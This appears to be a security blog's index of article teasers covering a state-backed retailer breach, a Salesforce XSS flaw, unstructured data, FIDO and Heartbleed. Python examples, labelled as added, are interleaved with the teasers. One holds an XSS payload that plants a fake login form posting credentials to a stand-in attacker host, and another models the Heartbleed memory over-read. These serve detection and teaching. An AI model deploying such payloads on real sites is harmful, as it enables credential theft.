


Q&A: Chinese military hacking tactics used against major U.S. retailer

By Byron V. Acohido

This snapshot of a cutting-edge cyber attack was discovered by analysts at Norse Corp, a security vendor that has built a global network of honeypots emulating the kinds of workplace and home appliances that get connected to the Internet, complete with embedded operating systems rife with vulnerabilities. Norse uses the honeypot network to watch cybercriminals scan for, infect, take control of and finally deploy vulnerable IoT appliances. Company founder and CTO Tommy Stiansen shared these details with LastWatchdog.

Core finding: Nation-state-backed cyber warfare campaigns typically focus on infrastructure such as utilities, defense contractors, financial firms and technology companies. However, forensic experts at Norse Corp. recently documented a hacking group using military-style breach and data-exfiltration techniques against a large U.S. retailer. The hackers, widely believed to be backed by the Chinese government, ignored the usual pot of gold, payment card transaction data, and instead went after intellectual property to support an elaborate counterfeiting campaign.

Attack vector: To get a foothold in the retailer’s network, the hackers spear-phished developers, engineers and designers, enticing them to download what they believed to be 3D software for use in their daily work. The targets did get the software, but the download also slipped malware into the company’s network.

Distinctive technique: The infected computers then began communicating with a command-and-control (C2) server through ordinary browser-style URL requests, with the data sent back to the C2 server encrypted. Norse analysts had to unravel multiple layers of obfuscation to reveal what was being exfiltrated, including translating part of the hackers’ encryption string from Japanese to English and another part from Korean to English.
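Exfiltration over plain URL requests is hard to spot by content alone once the payload is encrypted, but it leaves two structural tells: long, high-entropy query values and a regular beacon cadence from one client to one host. The script below is an added example, not Norse’s tooling or anything from the page; the log lines, the host name update-host.invalid, the seeded random blobs standing in for encrypted chunks, and the thresholds are all constructed for illustration.

```python
"""Added example: flag beacon-style HTTP requests carrying encoded blobs in the URL."""
import math
import random
import string
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Constructed sample proxy log (not real traffic). A seeded RNG stands in for the
# encrypted, hex-encoded chunks an implant would append to its requests.
_rng = random.Random(20150302)

def _blob(n=128):
    return "".join(_rng.choice("0123456789abcdef") for _ in range(n))

SAMPLE_LOG = "\n".join([
    "2015-03-02T09:00:01 10.1.4.22 GET http://www.example.com/index.html",
    "2015-03-02T09:00:05 10.1.4.22 GET http://cdn.example.com/css/site.css?v=3",
    "2015-03-02T09:05:00 10.1.4.22 GET http://update-host.invalid/img.php?id=" + _blob(),
    "2015-03-02T09:10:00 10.1.4.22 GET http://update-host.invalid/img.php?id=" + _blob(),
    "2015-03-02T09:15:00 10.1.4.22 GET http://update-host.invalid/img.php?id=" + _blob(),
    "2015-03-02T09:12:13 10.1.4.30 GET http://search.example.com/?q=quarterly+report+template",
])

ENCODED_ALPHABET = set(string.ascii_letters + string.digits + "+/=_-")
MIN_BLOB_LEN = 48     # shorter values are usually ids, tokens or words
MIN_ENTROPY = 3.0     # bits per char: random hex is about 3.9, base64 about 5.5

def shannon_entropy(s):
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def looks_encoded(value):
    """True for long, high-entropy values drawn only from hex/base64 characters."""
    return (len(value) >= MIN_BLOB_LEN
            and set(value) <= ENCODED_ALPHABET
            and shannon_entropy(value) >= MIN_ENTROPY)

def parse_log(text):
    """Parse 'timestamp client method url' lines into dicts with split query params."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url = line.split(maxsplit=3)
        parts = urlsplit(url)
        events.append({
            "ts": datetime.fromisoformat(ts),
            "client": client,
            "host": parts.hostname,
            "params": parse_qsl(parts.query, keep_blank_values=True),
        })
    return events

def find_beacons(events, min_hits=3, max_jitter=0.25):
    """Group encoded-looking requests per (client, host); flag regular intervals."""
    by_pair = defaultdict(list)
    for e in events:
        if any(looks_encoded(v) for _k, v in e["params"]):
            by_pair[(e["client"], e["host"])].append(e["ts"])
    flagged = []
    for (client, host), stamps in by_pair.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = sum(gaps) / len(gaps)
        if all(abs(g - mean) <= max_jitter * mean for g in gaps):
            flagged.append((client, host, round(mean)))
    return sorted(flagged)

def analyze(log_text=SAMPLE_LOG):
    return find_beacons(parse_log(log_text))

if __name__ == "__main__":
    for client, host, period in analyze():
        print(f"{client} -> {host}: encoded blobs roughly every {period}s")
```

The two tests are deliberately combined: a single long encoded value is common (session tokens, signed URLs), and a regular cadence alone is common (software update checks), but both together from a workstation to a host nobody else talks to is worth an analyst’s time. Tune MIN_BLOB_LEN and max_jitter against your own proxy logs before alerting on it.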

Wider implications: Retailers, or any other organization with trademarked and/or patented goods and services, should realize financial data isn’t the only data sophisticated hacking groups are proactively seeking. Governments engaging in cyber warfare must now worry that unleashing military hacking techniques against nonmilitary targets, for whatever … more

VIDEO: Elastica discovers major vulnerability in Salesforce cloud CRM app

By Byron V. Acohido

Cloud application security start-up Elastica should be commended for alerting Salesforce privately about a notable flaw Elastica researchers discovered in one of the subdomains of the official Salesforce website.

Elastica gave Salesforce the heads-up last month, and waited until the CRM giant readied a patch before going public with its finding Wednesday.

Elastica researchers unearthed a cross-site scripting (XSS) vulnerability in admin.salesforce.com, a subdomain used by Salesforce administrators.

Had criminal hackers beaten Elastica to the punch, they could have exploited a huge attack vector: thousands of companies, many of them small and mid-size organizations that subscribe to Salesforce, would have been exposed.


An attacker would have been able to execute phishing attacks from inside Salesforce and harvest users’ credentials, with a good chance of eluding spam filters and anti-phishing solutions.
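The page does not publish the Salesforce flaw itself, so what follows is an added illustration of the class of bug, not Elastica’s finding: a reflected parameter pasted into an admin page, the same page with proper output encoding, and the caveat that encoding is context-dependent (a `javascript:` URL survives HTML escaping untouched inside an `href`). The payload, the hostname attacker.invalid and the page templates are constructed for the example.

```python
"""Added example: a reflected XSS sink beside its escaped form, plus the href caveat."""
import html
from urllib.parse import urlsplit

# Constructed attacker payload (not from the page): turns a reflected parameter into a
# fake login form posting to a hostile site, served from the trusted admin domain.
PAYLOAD = ('<script>document.body.innerHTML='
           '"<form action=https://attacker.invalid/collect>Session expired, sign in again '
           '<input name=u><input name=p type=password></form>"</script>')

PAGE = "<html><body><h1>Welcome, {name}</h1></body></html>"
LINK = '<a href="{url}">Continue</a>'

def render_unsafe(name):
    """Vulnerable: the query parameter is pasted straight into the HTML body."""
    return PAGE.format(name=name)

def render_safe(name):
    """Hardened: HTML-encode for element-content context (& < > " ')."""
    return PAGE.format(name=html.escape(name, quote=True))

def render_link_unsafe(url):
    """Escaping alone does not help in a URL attribute: javascript: has no HTML metacharacters."""
    return LINK.format(url=html.escape(url, quote=True))

def render_link_safe(url):
    """For a URL attribute, validate the scheme first, then escape for the attribute."""
    scheme = urlsplit(url).scheme.lower()
    if scheme not in ("", "https"):
        url = "/"
    return LINK.format(url=html.escape(url, quote=True))

def has_active_content(page):
    """Crude stand-in for a browser: does the markup still contain script or a JS URL?"""
    low = page.lower()
    return "<script" in low or "javascript:" in low or "onerror=" in low

if __name__ == "__main__":
    print("unsafe body  :", has_active_content(render_unsafe(PAYLOAD)))
    print("escaped body :", has_active_content(render_safe(PAYLOAD)))
    print("unsafe href  :", has_active_content(render_link_unsafe("javascript:alert(1)")))
    print("checked href :", render_link_safe("javascript:alert(1)"))
```

The phishing angle in the paragraph above is why this matters more than a pop-up: the injected form is served from the real domain over the real TLS certificate, so URL-based filters and users checking the address bar both see nothing wrong. A Content-Security-Policy that disallows inline script limits the blast radius when a sink like `render_unsafe` is missed.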

But there is a larger lesson here. Business software can be riddled with flaws like this one, waiting to be discovered. Depending on who finds these so-called zero-day vulnerabilities first, either patching or exploitation can be expected to eventually follow. ThirdCertainty asked Aditya K. Sood, lead architect of Elastica Cloud Threat Labs, to outline the wider context.

3C: Can you characterize how pervasive these types of latent, but as yet undiscovered, vulnerabilities are in business software?

Sood: Any public-facing application is susceptible to an attack. It is difficult to say how many business applications are, but developers can make mistakes, which could result in vulnerabilities. For that reason, we require security assessments of business applications before they are deployed in production environments.

3C: How effective are bounty programs in keeping these types of vulnerabilities mitigated?

Sood: Bug bounties motivate researchers to disclose vulnerabilities to the vendors in a responsible fashion and, in return, researchers get rewarded for their efforts. It definitely helps to build positive relationships with security researchers. It is a very cost-effective … more

VIDEO: Why it’s high time ‘unstructured data’ gets acknowledged, protected

By Byron V. Acohido

Companies are generating mountains of unstructured data and, in doing so, unwittingly adding to their security exposure.

Unstructured data is any piece of information that doesn’t get stored in a database or some other formal data management system.

Some 80 percent of business data is said to be unstructured, and that share is almost certainly rising. Think of it as employee-generated business information: the sum total of the ingenuity we display in the workplace, typing away in productivity and collaboration software and dispersing our pearls of wisdom in digital communications.

Unstructured data is all of the data that we are generating on our laptops and mobile devices, storing in cloud services, transferring in email and text messages, and pitching into social media sites.

Many companies are just starting to come to grips with the complex challenge of figuring out how to categorize and manage this deluge of unstructured data.

Sensitive data at risk

But what’s more concerning is the gaping security exposure.

It was unstructured data—in the form of a text message transcript of employees conversing about deflating footballs—that blindsided the New England Patriots NFL team and its star quarterback, Tom Brady.

Yet the full scope of risk created by unstructured data is much more profound.

“The risk that unstructured data poses dwarfs that of any other type of data,” says Adam Laub, product management vice president at STEALTHbits Technologies.  “It is the least understood form of data in terms of access, activity, ownership and content.”

I met with Laub as he was pitching STEALTHbits’ technology at the recent RSA Conference in San Francisco. “Any single file can contain the data that puts an organization in the headlines, and turning a blind eye to the problem or claiming it’s too big to handle is not a valid excuse for why unstructured data hasn’t been secured properly,” Laub says.
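Laub’s four unknowns (access, activity, ownership, content) are exactly what a first-pass inventory of loose files should answer. The script below is an added example, not STEALTHbits’ product or anything from the page: it walks a directory tree, flags files whose text contains a Luhn-valid card number or an SSN-shaped string, and records the owner and permission bits alongside. The sample files are constructed in a temporary directory and removed afterwards.

```python
"""Added example: walk a tree of loose files, flag sensitive content, record who can read it."""
import os
import re
import shutil
import stat
import tempfile

PAN_RE = re.compile(r"\b(?:\d[ -]?){12,15}\d\b")   # 13-16 digits, optional separators
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")

def luhn_ok(digits):
    """Luhn checksum, used to cut false positives on random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0

def classify(text):
    kinds = set()
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"\D", "", m.group())
        if 13 <= len(digits) <= 16 and luhn_ok(digits):
            kinds.add("PAN")
    if SSN_RE.search(text):
        kinds.add("SSN")
    return kinds

def scan_tree(root, max_bytes=1_000_000):
    """Return one finding per file with sensitive content, with owner and mode."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
                with open(path, "rb") as fh:
                    text = fh.read(max_bytes).decode("utf-8", errors="ignore")
            except OSError:
                continue
            kinds = classify(text)
            if kinds:
                findings.append({
                    "path": os.path.relpath(path, root),
                    "kinds": sorted(kinds),
                    "uid": st.st_uid,
                    "mode": stat.filemode(st.st_mode),
                    "world_readable": bool(st.st_mode & stat.S_IROTH),
                })
    return sorted(findings, key=lambda f: f["path"])

def build_sample_tree():
    """Constructed sample files (not real data); caller removes the directory."""
    root = tempfile.mkdtemp(prefix="unstructured-")
    samples = {
        "notes/meeting.txt": ("Agenda: Q3 planning. Bring the roadmap slides.", 0o600),
        "chat/export.txt": ("bob: refund goes to card 4111 1111 1111 1111, thanks", 0o644),
        "hr/old_form.txt": ("Applicant SSN 123-45-6789 (typed up from paper)", 0o600),
    }
    for rel, (body, mode) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return root

def demo():
    """Build the sample tree, scan it, clean up; returns the findings."""
    root = build_sample_tree()
    try:
        return scan_tree(root)
    finally:
        shutil.rmtree(root)

if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}: {','.join(f['kinds'])} mode={f['mode']} "
              f"uid={f['uid']} world_readable={f['world_readable']}")
```

On a real share the interesting output is not the hit count but the join: a file with a card number, owned by an account that left the company, readable by Everyone. The regular expressions here only cover two patterns; production classifiers add document fingerprints and keyword dictionaries, but the inventory shape (path, content class, owner, effective access) is what the rest of the program is built on.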

STEALTHbits helps companies that use Windows Active Directory … more

FIRESIDE CHAT: Why board directors, senior execs must gain full understanding of data breaches

By Byron V. Acohido

Driven by the fallout of major data breaches at Target, Sony Pictures, Anthem and hundreds of other large and small organizations elsewhere, cybersecurity is now a problem of strategic importance in organizations of all sizes.

ThirdCertainty sat down last week at the RSA Conference in San Francisco with Howard Schmidt, former White House Cybersecurity Advisor under Presidents Bush and Obama, to discuss the wider context. The fireside chat was sponsored by TaaSera, supplier of pre-emptive breach detection systems.

3C: Are the dots starting to connect in the minds of senior executives that their organizations are facing profound new exposures?

Schmidt: Yes, they are starting to look at cybersecurity as a strategic issue that needs to be dealt with at the corporate level. The financial services sector years ago said, “OK, we can lose this amount of money through credit card fraud, and we can work within that.” Now the exposures are much more than that. It’s reputation, it’s government regulation, it’s customer confidence, and so a lot of attention is going into it.


3C: Security vendors certainly are paying attention. There’s no shortage of clever technology to defend networks.

Schmidt: Yes, clearly. Every year at RSA and at Infosec Europe, I see products developed to react to what happened this past year or last week or last month, so you wind up in a situation where you are chasing the problem instead of developing systems to deal with those problems before they occur. For example, we have tremendous capabilities: intrusion detection, intrusion prevention, malware protection, breach detection, all those sort of things. They’ve been good, but they have not been as effective as we need them to be.

3C: Because they’re perimeter focused?

Schmidt: That’s correct, they’re all perimeter-based, so when somebody gets in and it looks like they should be inside, they can start doing … more

Q&A: Is ‘FIDO’ on Samsung Galaxy superior to Apple Pay on iPhone?

By Byron V. Acohido

A day after Apple successfully hyped the ability for iPhone 6 users to biometrically authenticate the purchase of a Big Mac, using Apple Pay and Touch ID, Google rolled out Google Security Key, a new type of USB key based on the FIDO U2F standard. Security Key makes a Gmail account far harder to hijack, because a phished password alone no longer completes the login.

The two announcements are related. Both point the way to mainstream use of biometric sensors and other mechanisms for affirming you are who you say you are in digital communications and transactions.

LastWatchdog asked Brett McDowell, Executive Director of the FIDO Alliance, to handicap the competition to dominate the next generation of authentication technologies.

LW: In plain language, what is FIDO?

McDowell: FIDO stands for Fast IDentity Online. It’s a new set of industry standards, much like WiFi, Bluetooth and NFC. Any device manufacturer, software developer or online service provider can build support for FIDO standards into their existing products and services to make online authentication simpler and more secure.

The fact that this is all being standardized means the FIDO ecosystem can grow and scale. Any new implementation of the standards that pops up on the Internet will be able to immediately interoperate with any other implementation.

FIDO standards allow online service providers the option to set their own policies about what kind of authenticators they are willing to trust. That includes PIN codes, voice or face recognition software, fingerprint readers, iris scanners, etc.

LW: What is the key distinction between how Apple is moving to popularize biometrically authenticated consumer purchases vs. the course the FIDO alliance is on?

McDowell: Apple Pay is a payment application, and just like every other application, it requires authentication. The Touch ID sensor, which is used as the authenticator for other applications, including but not limited to Apple Pay, is quite relevant to a discussion about FIDO standards.

To level set, the FIDO Alliance is an … more

VIDEO: Why $3.6 million to prevent next Heartbleed isn’t enough

By Byron V. Acohido

A dozen tech behemoths — led by Microsoft, IBM, Google, Intel and Cisco — have stepped forward with cold, hard cash to prevent the next Heartbleed.

Each has pledged $100,000 annually for the next three years to a war chest earmarked to fund improvements of open source technology.

That’s a collective pledge of $3.6 million, through 2016, set aside in something called the Core Infrastructure Initiative, administered by The Linux Foundation.

VIDEO: Heartbleed threatens financial channels

By Scott Borg

There seems to be some confusion about what Heartbleed is good for. Heartbleed is primarily useful for retrieving information from webservers that reveals the details of those servers’ recent interactions with clients.

This allows attackers to steal the “handshake” information that is used to authenticate an interaction between a client computer and a webserver. In particular, Heartbleed allows attackers to steal the private keys and other long-term authentication codes that are used to set up private, encrypted communication sessions.

Heartbleed can also allow the attacker to steal enough of the content of the server’s recent communications to capture account numbers and passwords. Together, these pieces of information can allow the attacker to impersonate a client computer without any need to invade that computer.
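The mechanism behind the leaks described above is a single missing bounds check in OpenSSL’s TLS heartbeat handler: the server trusted the attacker-supplied payload_length field and copied that many bytes from its own heap into the reply. The Python below is an added model of that logic and of the check added in OpenSSL 1.0.1g; it is not OpenSSL code and not part of the original post. The heap contents next to the record are a constructed stand-in.

```python
"""Added example: the Heartbleed bounds check, vulnerable and fixed, modelled in Python."""
import struct
from typing import Optional

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16  # RFC 6520: at least 16 bytes of padding follow the payload

def build_heartbeat(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """type(1) | payload_length(2) | payload | padding. claimed_length lets us lie, as an attacker would."""
    length = len(payload) if claimed_length is None else claimed_length
    return bytes([HB_REQUEST]) + struct.pack("!H", length) + payload + b"\x00" * PADDING

# Constructed stand-in for whatever happens to sit after the record on the server's heap.
NEIGHBOUR_MEMORY = b"...session cookie=abc123; user=alice; -----BEGIN RSA PRIVATE KEY-----..."

def handle_vulnerable(record: bytes, heap_after: bytes = NEIGHBOUR_MEMORY) -> bytes:
    """Pre-1.0.1g logic: trust payload_length and copy that many bytes from the payload offset."""
    payload_length = struct.unpack("!H", record[1:3])[0]
    heap = record + heap_after                 # the record is not the end of memory
    payload = heap[3:3 + payload_length]       # reads past the record when length is inflated
    return bytes([HB_RESPONSE]) + struct.pack("!H", payload_length) + payload + b"\x00" * PADDING

def handle_fixed(record: bytes, heap_after: bytes = NEIGHBOUR_MEMORY) -> Optional[bytes]:
    """1.0.1g logic: silently discard any record whose claimed payload does not fit inside it."""
    if len(record) < 1 + 2 + PADDING:
        return None
    payload_length = struct.unpack("!H", record[1:3])[0]
    if 1 + 2 + payload_length + PADDING > len(record):
        return None
    payload = record[3:3 + payload_length]
    return bytes([HB_RESPONSE]) + struct.pack("!H", payload_length) + payload + b"\x00" * PADDING

def leaked_bytes(response: bytes, honest_payload: bytes) -> bytes:
    """Everything in the echoed payload beyond what the client actually sent."""
    payload_length = struct.unpack("!H", response[1:3])[0]
    return response[3:3 + payload_length][len(honest_payload):]

if __name__ == "__main__":
    honest = b"hello"
    evil = build_heartbeat(honest, claimed_length=128)
    print("vulnerable leaks:", leaked_bytes(handle_vulnerable(evil), honest))
    print("fixed replies   :", handle_fixed(evil))
```

A 64 KiB maximum per request sounds small, but the request can be repeated indefinitely with no log entry, which is how attackers harvested session cookies, passwords in flight and, with enough tries, private key material. The fix is the one-line comparison in `handle_fixed`; the lesson for anyone writing parsers is that a length field inside the message must be checked against the length of the buffer that actually arrived.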

Criminals using Heartbleed would be able to arrange improper transfers of funds on a fairly large scale, unless the various kinds of authentication codes were changed in time. While Heartbleed can also be used to invade many types of client computers, such as Android phones, potential attackers don’t need Heartbleed to do that. Most Android phones, for example, can already be compromised, using any of several tools currently available from cyber-crime websites.

Sophisticated attackers taking advantage of Heartbleed will be after bigger, more lucrative game than cell phones and credit card numbers. A large portion of the web’s financial channels were potentially in jeopardy.

Fortunately, there were probably not many cyber attackers aware of the Heartbleed vulnerability before the patches for it started to be distributed. Perhaps even more important, there were not enough criminal attackers who understood enough about how financial transactions are carried out to take full advantage of the possibilities Heartbleed opened up.

This means that the biggest opportunities that Heartbleed created for stealing money were mostly closed up before they were much exploited. If there were some large diversions of funds accomplished by using Heartbleed, these will probably never be publicly acknowledged, because … more